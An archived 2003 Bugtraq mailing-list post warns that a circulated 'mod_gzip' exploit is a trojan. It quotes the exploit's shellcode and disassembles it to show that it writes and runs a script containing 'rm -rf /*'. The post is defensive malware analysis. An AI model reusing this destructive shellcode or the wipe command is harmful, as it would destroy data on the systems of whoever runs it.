| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3FC09F70.4050605@freebsd.lublin.pl>
Date: Sun, 23 Nov 2003 12:52:16 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Re: m00-mod_gzip.c
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
d4rkgr3y wrote:
> /* m00-mod_gzip.c
Do NOT run it, this is a fake exploit, which calls rm -rf /:
> char default_shellcode[] =
> "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
> "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
> "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
> "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
> "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
> "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
> "\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
> "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";
0x0804a5a0 <default_shellcode+0>: xor %eax,%eax
0x0804a5a2 <default_shellcode+2>: push %eax
0x0804a5a3 <default_shellcode+3>: push $0x6e69622f
0x0804a5a8 <default_shellcode+8>: mov %esp,%ebx
0x0804a5aa <default_shellcode+10>: mov $0xc,%al
0x0804a5ac <default_shellcode+12>: int $0x80 -> chdir("/bin")
0x0804a5ae <default_shellcode+14>: xor %eax,%eax
0x0804a5b0 <default_shellcode+16>: push %eax
0x0804a5b1 <default_shellcode+17>: push $0x7a7a7a7a
0x0804a5b6 <default_shellcode+22>: mov %esp,%ebx
0x0804a5b8 <default_shellcode+24>: push $0x41
0x0804a5ba <default_shellcode+26>: pop %ecx
0x0804a5bb <default_shellcode+27>: mov $0x5,%al
0x0804a5bd <default_shellcode+29>: int $0x80 -> open("zzzz", 0x41)
0x0804a5bf <default_shellcode+31>: xor %ecx,%ecx
0x0804a5c1 <default_shellcode+33>: push %ecx
0x0804a5c2 <default_shellcode+34>: push $0x26202a2f
0x0804a5c7 <default_shellcode+39>: push $0x2066722d
0x0804a5cc <default_shellcode+44>: push $0x206d720a
0x0804a5d1 <default_shellcode+49>: push $0x6c6c696b
0x0804a5d6 <default_shellcode+54>: push $0x20662d20
0x0804a5db <default_shellcode+59>: push $0x6d720a68
0x0804a5e0 <default_shellcode+64>: push $0x732f6e69
0x0804a5e5 <default_shellcode+69>: push $0x622f2123
0x0804a5ea <default_shellcode+74>: mov %esp,%ecx
0x0804a5ec <default_shellcode+76>: mov %eax,%ebx
0x0804a5ee <default_shellcode+78>: mov $0x20,%dl
0x0804a5f0 <default_shellcode+80>: mov $0x4,%al
0x0804a5f2 <default_shellcode+82>: int $0x80 -> write(fd, "#!/bin/sh
rm -f kill
rm -rf /* &", 0x20);
0x0804a5f4 <default_shellcode+84>: mov $0x6,%al
0x0804a5f6 <default_shellcode+86>: int $0x80 -> close(fd)
0x0804a5f8 <default_shellcode+88>: xor %eax,%eax
0x0804a5fa <default_shellcode+90>: push %eax
0x0804a5fb <default_shellcode+91>: push $0x7a7a7a7a
0x0804a600 <default_shellcode+96>: mov %esp,%ebx
0x0804a602 <default_shellcode+98>: mov $0x1ed,%cx
0x0804a606 <default_shellcode+102>: mov $0xf,%al
0x0804a608 <default_shellcode+104>: int $0x80 -> chmod("zzz", 0755)
0x0804a60a <default_shellcode+106>: xor %eax,%eax
0x0804a60c <default_shellcode+108>: xor %edx,%edx
0x0804a60e <default_shellcode+110>: push %eax
0x0804a60f <default_shellcode+111>: push $0x7a7a7a7a
0x0804a614 <default_shellcode+116>: push $0x2f2f2f2e
0x0804a619 <default_shellcode+121>: mov %esp,%ebx
0x0804a61b <default_shellcode+123>: push %eax
0x0804a61c <default_shellcode+124>: push %ebx
0x0804a61d <default_shellcode+125>: mov %esp,%ecx
0x0804a61f <default_shellcode+127>: mov $0xb,%al
0x0804a621 <default_shellcode+129>: int $0x80 ->
execve("/bin/zzzz", "/bin/zzzz", 0)
0x0804a623 <default_shellcode+131>: xor %eax,%eax
0x0804a625 <default_shellcode+133>: inc %eax
0x0804a626 <default_shellcode+134>: int $0x80 -> exit()
0x0804a628 <default_shellcode+136>: add %al,(%eax)
0x0804a62a <default_shellcode+138>: add %al,(%eax)
0x0804a62c <default_shellcode+140>: add %al,(%eax)
0x0804a62e <default_shellcode+142>: add %al,(%eax)
0x0804a630 <default_shellcode+144>: add %al,(%eax)
0x0804a632 <default_shellcode+146>: add %al,(%eax)
0x0804a634 <default_shellcode+148>: add %al,(%eax)
0x0804a636 <default_shellcode+150>: add %al,(%eax)
0x0804a638 <default_shellcode+152>: add %al,(%eax)
0x0804a63a <default_shellcode+154>: add %al,(%eax)
0x0804a63c <default_shellcode+156>: add %al,(%eax)
0x0804a63e <default_shellcode+158>: add %al,(%eax)
[...]
> (long) range=default_shellcode;
> range();
[...]
- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* Inet: przemyslaw@...sunek.com ** keyId: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQE/wJ9vkxEnBiV4/K0RAldLAKDam66ZCmIiqoGUn3eqpp25ucyVXgCgvSRS
9bc6c5pGkgncYeToNPsZeeM=
=jxIK
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists